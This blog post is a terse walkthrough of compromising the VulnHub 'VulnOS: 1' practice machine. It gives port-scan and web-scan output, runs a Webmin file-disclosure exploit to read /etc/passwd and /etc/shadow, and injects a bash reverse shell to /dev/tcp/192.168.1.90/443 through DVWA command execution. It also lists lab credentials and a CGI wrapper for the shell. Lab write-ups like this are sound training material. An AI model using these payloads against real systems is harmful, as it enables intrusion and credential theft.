Monday, October 14, 2019

Vulnhub: VulnOS: 1

source: https://www.vulnhub.com/entry/vulnos-1,60/

192.168.1.105

ubuntu server 10.04 LTS

22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.7.0-P1
80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login
514/tcp   open  tcpwrapped
901/tcp   open  http        Samba SWAT administration server
993/tcp   open  ssl/imaps?
995/tcp   open  ssl/pop3s?
2000/tcp  open  sieve       Dovecot timsieved
2049/tcp  open  nfs         2-4 (RPC #100003)
3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp  open  distccd     distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp  open  irc         IRCnet ircd
8070/tcp  open  ucs-isc?
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
38175/tcp open  nlockmgr    1-4 (RPC #100021)
41631/tcp open  mountd      1-3 (RPC #100005)
55692/tcp open  status      1 (RPC #100024)

+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3268: /imgs/: Directory indexing found.
+ OSVDB-3092: /imgs/: This might be interesting...
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.23
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie 5d89dac18813e15aa2f75788275e3588 created without the httponly flag
+ /phpldapadmin/: Admin login page/section found.
+ Cookie PPA_ID created without the httponly flag
+ /phppgadmin/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.

/.htaccess (Status: 200)
/cgi-bin/ (Status: 403)
/imgs (Status: 301)
/index (Status: 200)
/index.html (Status: 200)
/index2 (Status: 200)
/javascript (Status: 301)
/mediawiki (Status: 301)
  mediawiki v1.15.1
/phpldapadmin (Status: 301)
  phpLDAPadmin v1.2.0.5
/phpmyadmin (Status: 301)
  phpmyadmin v3.3.2.0
/phppgadmin (Status: 301)
  phpPgAdmin v4.2.2 (PHP 5.3.2-1ubuntu4.23)
/server-status (Status: 403)
/drupal6 (Status: 301)
  /DVWA-1.0.8
  http://192.168.1.105/DVWA-1.0.8/login.php
    username admin, password password
/egroupware (Status: 301)
  stylite’s egroupware v1.8
/phpgroupware (Status: 301)
  phpGroupWare 1:0.9.16.012+dfsg-10 (Debian)
/phpsysinfo (Status: 301)
  phpsysinfo v3.0.4
  2.6.32-57-generic-pae (SMP) i686


https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)

perl 2017.pl 192.168.1.105 10000 /etc/passwd 0
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
sysadmin:x:1001:1001::/home/sysadmin:/bin/sh
webmin:x:1002:1002::/home/webmin:/bin/sh
hackme:x:1003:1003::/home/hackme:/bin/sh
sa:x:1004:1004::/home/sa:/bin/sh
stupiduser:x:1005:1005::/home/stupiduser:/bin/sh

perl 2017.pl 192.168.1.105 10000 /etc/shadow 0
vulnosadmin:$6$SLXu95CH$pVAdp447R4MEFKtHrWcDV7WIBuiP2Yp0NJTVPyg37K9U11SFuLena8p.xbnSVJFAeg1WO28ljNAPrlXaghLmo/:16137:0:99999:7:::
sysadmin:admin:16137:0:99999:7:::
webmin:webmin:16137:0:99999:7:::
hackme:hackme:16137:0:99999:7:::
sa:password1:16137:0:99999:7:::
stupiduser:stupiduser:16137:0:99999:7:::

http://192.168.1.105/DVWA-1.0.8/vulnerabilities/exec/
; echo "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'\");?>" > /var/www/dolibarr-3.0.0/rs.php

http://192.168.1.105/dolibarr-3.0.0/rs.php

cp /home/hackme/vulnleaks.pdf.zip /var/www/dolibarr-3.0.0
john vulnleaks.pdf.zip:
password admins

cp /home/sysadmin/user_bankaccounts.ods /var/www/dolibarr-3.0.0
vulnosadmin 125487-9821211-5987 4574 1256000$
root 156987-1458971 9871 569000000$
sa 48726987-89578 7412 450000$
webmin 48741269-5897412 7485 130050$

/var/www/webERP/config.php:
$DBUser = 'root';
$DBPassword = 'toor';

mysql username root, password toor

http://192.168.1.105/dolibarr-3.0.0/htdocs/
username vulnosadmin, password vulnosadmin

http://192.168.1.105/webERP/
username admin, password weberp
username WEB0000017, password weberp

http://192.168.1.105/drupal6/
username drupal6, password drupal6
username webmin, password 

http://192.168.1.105/DVWA-1.0.8/login.php
username admin, password password
username gordonb, password abc123
username 1337, password charley
username pablo, password letmein
username smithy, password password

upload /tmp/rs.php

upload /tmp/1.cgi
#!/usr/bin/perl -w
print “Content-type: text/plain\n\n”
exec  "php /tmp/rs.php";

perl ./2017.pl 192.168.1.105 10000 /tmp/1.cgi 0


Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)